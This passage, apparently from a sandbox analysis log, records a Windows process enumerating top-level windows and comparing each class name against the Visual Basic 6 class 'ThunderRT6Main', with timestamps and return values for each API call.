(lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x30106, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.282] GetWindowLongA (hWnd=0x30106, nIndex=-16) returned -2080374784 [0089.282] GetWindowLongA (hWnd=0x30106, nIndex=-6) returned 1997799424 [0089.282] GetWindowLongA (hWnd=0x30106, nIndex=-6) returned 1997799424 [0089.282] GetWindow (hWnd=0x30106, uCmd=0x2) returned 0x201d6 [0089.282] GetClassNameA (in: hWnd=0x201d6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MsoStdCompMgr") returned 13 [0089.282] lstrcmpA (lpString1="MsoStdCompMgr", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x201d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.282] GetWindowLongA (hWnd=0x201d6, nIndex=-16) returned -2080374784 [0089.282] GetWindowLongA (hWnd=0x201d6, nIndex=-6) returned 1759510528 [0089.282] GetWindowLongA (hWnd=0x201d6, nIndex=-6) returned 1759510528 [0089.282] GetWindow (hWnd=0x201d6, uCmd=0x2) returned 0x101ca [0089.282] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0089.282] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9fc [0089.282] GetWindow (hWnd=0x101ca, uCmd=0x2) returned 0x201c6 [0089.282] GetClassNameA (in: hWnd=0x201c6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="_WwO") returned 4 [0089.282] lstrcmpA (lpString1="_WwO", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.282] GetWindowLongA (hWnd=0x201c6, nIndex=-16) returned -2080374784 [0089.282] GetWindowLongA (hWnd=0x201c6, nIndex=-6) returned 1785659392 [0089.282] GetWindowLongA (hWnd=0x201c6, nIndex=-6) returned 1785659392 [0089.282] GetWindow (hWnd=0x201c6, uCmd=0x2) returned 0x101ba [0089.282] GetClassNameA (in: hWnd=0x101ba, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0089.282] lstrcmpA (lpString1="GDI+ Hook Window Class", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.282] GetWindowLongA (hWnd=0x101ba, nIndex=-16) returned -2080374784 [0089.282] GetWindowLongA (hWnd=0x101ba, nIndex=-6) returned 1938030592 [0089.282] GetWindowLongA (hWnd=0x101ba, nIndex=-6) returned 1938030592 [0089.282] GetWindow (hWnd=0x101ba, uCmd=0x2) returned 0x6019c [0089.282] GetClassNameA (in: hWnd=0x6019c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ARC Window Class") returned 16 [0089.282] lstrcmpA (lpString1="ARC Window Class", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x6019c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.282] GetWindowLongA (hWnd=0x6019c, nIndex=-16) returned -2080374784 [0089.282] GetWindowLongA (hWnd=0x6019c, nIndex=-6) returned 12648448 [0089.282] GetWindowLongA (hWnd=0x6019c, nIndex=-6) returned 12648448 [0089.282] GetWindow (hWnd=0x6019c, uCmd=0x2) returned 0x1019a [0089.282] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8fc [0089.283] GetWindow (hWnd=0x1019a, uCmd=0x2) returned 0x10198 [0089.283] GetClassNameA (in: hWnd=0x10198, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Nervebraceletcls") returned 16 [0089.283] lstrcmpA (lpString1="Nervebraceletcls", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8fc [0089.283] GetWindow (hWnd=0x10198, uCmd=0x2) returned 0x10196 [0089.283] GetClassNameA (in: hWnd=0x10196, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0089.283] GetWindow (hWnd=0x10196, uCmd=0x2) returned 0x10194 [0089.283] GetClassNameA (in: hWnd=0x10194, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Lease_Entitled_pcs_class") returned 24 [0089.283] lstrcmpA (lpString1="Lease_Entitled_pcs_class", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0089.283] GetWindow (hWnd=0x10194, uCmd=0x2) returned 0x10192 [0089.283] GetClassNameA (in: hWnd=0x10192, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8dc [0089.283] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0089.283] GetClassNameA (in: hWnd=0x10190, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Lighter") returned 7 [0089.283] lstrcmpA (lpString1="Lighter", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8dc [0089.283] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0089.283] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8cc [0089.283] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0089.283] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Distributors_window") returned 19 [0089.283] lstrcmpA (lpString1="Distributors_window", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8cc [0089.283] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x10188 [0089.283] GetClassNameA (in: hWnd=0x10188, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="advocate_keep_window") returned 20 [0089.283] lstrcmpA (lpString1="advocate_keep_window", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8b8 [0089.283] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x1018a [0089.283] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8b8 [0089.283] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10184 [0089.283] GetClassNameA (in: hWnd=0x10184, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="irish_window") returned 12 [0089.283] lstrcmpA (lpString1="irish_window", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8a8 [0089.283] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0089.283] GetClassNameA (in: hWnd=0x10186, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.283] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8a8 [0089.283] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0089.283] GetClassNameA (in: hWnd=0x10180, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="fifthrollercls") returned 14 [0089.283] lstrcmpA (lpString1="fifthrollercls", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x898 [0089.284] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0089.284] GetClassNameA (in: hWnd=0x10182, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x898 [0089.284] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0089.284] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="evanescenceOscarEmclass") returned 23 [0089.284] lstrcmpA (lpString1="evanescenceOscarEmclass", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x888 [0089.284] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0089.284] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x888 [0089.284] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0089.284] GetClassNameA (in: hWnd=0x10178, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="remainedUniverseSoleapp") returned 23 [0089.284] lstrcmpA (lpString1="remainedUniverseSoleapp", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x878 [0089.284] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0089.284] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x878 [0089.284] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0089.284] GetClassNameA (in: hWnd=0x10174, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="PanelMariaSuggestionclass") returned 25 [0089.284] lstrcmpA (lpString1="PanelMariaSuggestionclass", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x868 [0089.284] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0089.284] GetClassNameA (in: hWnd=0x10176, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x868 [0089.284] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0089.284] GetClassNameA (in: hWnd=0x10170, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="invalid_cls") returned 11 [0089.284] lstrcmpA (lpString1="invalid_cls", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x858 [0089.284] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0089.284] GetClassNameA (in: hWnd=0x10172, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x858 [0089.284] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0089.284] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="myersbiggestQatarwnd") returned 20 [0089.284] lstrcmpA (lpString1="myersbiggestQatarwnd", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x848 [0089.284] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0089.284] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x848 [0089.284] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0089.284] GetClassNameA (in: hWnd=0x10168, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Info_began_Nobody_Tops_class") returned 28 [0089.284] lstrcmpA (lpString1="Info_began_Nobody_Tops_class", lpString2="ThunderRT6Main") returned -1 [0089.284] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x838 [0089.284] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0089.284] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x838 [0089.285] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0089.285] GetClassNameA (in: hWnd=0x10164, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="charge_trackbacks_observe_cls") returned 29 [0089.285] lstrcmpA (lpString1="charge_trackbacks_observe_cls", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x828 [0089.285] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0089.285] GetClassNameA (in: hWnd=0x10166, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x828 [0089.285] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0089.285] GetClassNameA (in: hWnd=0x10160, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Designed_wnd") returned 12 [0089.285] lstrcmpA (lpString1="Designed_wnd", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x818 [0089.285] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0089.285] GetClassNameA (in: hWnd=0x10162, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x818 [0089.285] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0089.285] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="FoodLogosLotapp") returned 15 [0089.285] lstrcmpA (lpString1="FoodLogosLotapp", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x808 [0089.285] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0089.285] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x808 [0089.285] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x10158 [0089.285] GetClassNameA (in: hWnd=0x10158, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Enterprisemonsterscommentswin") returned 29 [0089.285] lstrcmpA (lpString1="Enterprisemonsterscommentswin", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x128 [0089.285] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x1015a [0089.285] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x128 [0089.285] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x20154 [0089.285] GetClassNameA (in: hWnd=0x20154, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="involved_int_antenna_lol_wnd") returned 28 [0089.285] lstrcmpA (lpString1="involved_int_antenna_lol_wnd", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x52c [0089.285] GetWindow (hWnd=0x20154, uCmd=0x2) returned 0x7013a [0089.285] GetClassNameA (in: hWnd=0x7013a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x52c [0089.285] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x10152 [0089.285] GetClassNameA (in: hWnd=0x10152, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="LyricsmorningEffectivenessclass") returned 31 [0089.285] lstrcmpA (lpString1="LyricsmorningEffectivenessclass", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10152, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x510 [0089.285] GetWindow (hWnd=0x10152, uCmd=0x2) returned 0x10156 [0089.285] GetClassNameA (in: hWnd=0x10156, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.285] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x510 [0089.285] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x1014c [0089.285] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Bookings_cls") returned 12 [0089.285] lstrcmpA (lpString1="Bookings_cls", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x420 [0089.286] GetWindow (hWnd=0x1014c, uCmd=0x2) returned 0x10150 [0089.286] GetClassNameA (in: hWnd=0x10150, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x420 [0089.286] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10146 [0089.286] GetClassNameA (in: hWnd=0x10146, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="output_cls") returned 10 [0089.286] lstrcmpA (lpString1="output_cls", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x424 [0089.286] GetWindow (hWnd=0x10146, uCmd=0x2) returned 0x1014a [0089.286] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x424 [0089.286] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x3013c [0089.286] GetClassNameA (in: hWnd=0x3013c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Argentina_Conducting_Merchandise_win") returned 36 [0089.286] lstrcmpA (lpString1="Argentina_Conducting_Merchandise_win", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x740 [0089.286] GetWindow (hWnd=0x3013c, uCmd=0x2) returned 0x10144 [0089.286] GetClassNameA (in: hWnd=0x10144, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x740 [0089.286] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x30136 [0089.286] GetClassNameA (in: hWnd=0x30136, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="blowIranLaboratoryDisastercls") returned 29 [0089.286] lstrcmpA (lpString1="blowIranLaboratoryDisastercls", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x30136, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x150 [0089.286] GetWindow (hWnd=0x30136, uCmd=0x2) returned 0x20138 [0089.286] GetClassNameA (in: hWnd=0x20138, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x150 [0089.286] GetWindow (hWnd=0x20138, uCmd=0x2) returned 0x10132 [0089.286] GetClassNameA (in: hWnd=0x10132, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0089.286] lstrcmpA (lpString1="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.286] GetWindow (hWnd=0x10132, uCmd=0x2) returned 0x10122 [0089.286] GetClassNameA (in: hWnd=0x10122, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0089.286] lstrcmpA (lpString1="BluetoothNotificationAreaIconWindowClass", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.286] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0089.286] GetClassNameA (in: hWnd=0x10120, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0089.286] lstrcmpA (lpString1="MS_WebcheckMonitor", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5e0 [0089.286] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0089.286] GetClassNameA (in: hWnd=0x20116, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="PNIHiddenWnd") returned 12 [0089.286] lstrcmpA (lpString1="PNIHiddenWnd", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.286] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0089.286] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Media Center SSO") returned 16 [0089.286] lstrcmpA (lpString1="Media Center SSO", lpString2="ThunderRT6Main") returned -1 [0089.286] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5e0 [0089.286] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0089.286] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.287] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5e0 [0089.287] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0089.287] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ATL:73723188") returned 12 [0089.287] lstrcmpA (lpString1="ATL:73723188", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.287] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0089.287] GetClassNameA (in: hWnd=0x20020, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.287] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.287] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0089.287] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="SystemTray_Main") returned 15 [0089.287] lstrcmpA (lpString1="SystemTray_Main", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.287] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0089.287] GetClassNameA (in: hWnd=0x20016, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.287] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.287] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0089.287] GetClassNameA (in: hWnd=0x200ae, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.287] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.287] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0089.287] GetClassNameA (in: hWnd=0x2009e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.287] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0089.287] GetClassNameA (in: hWnd=0x2008c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0089.287] lstrcmpA 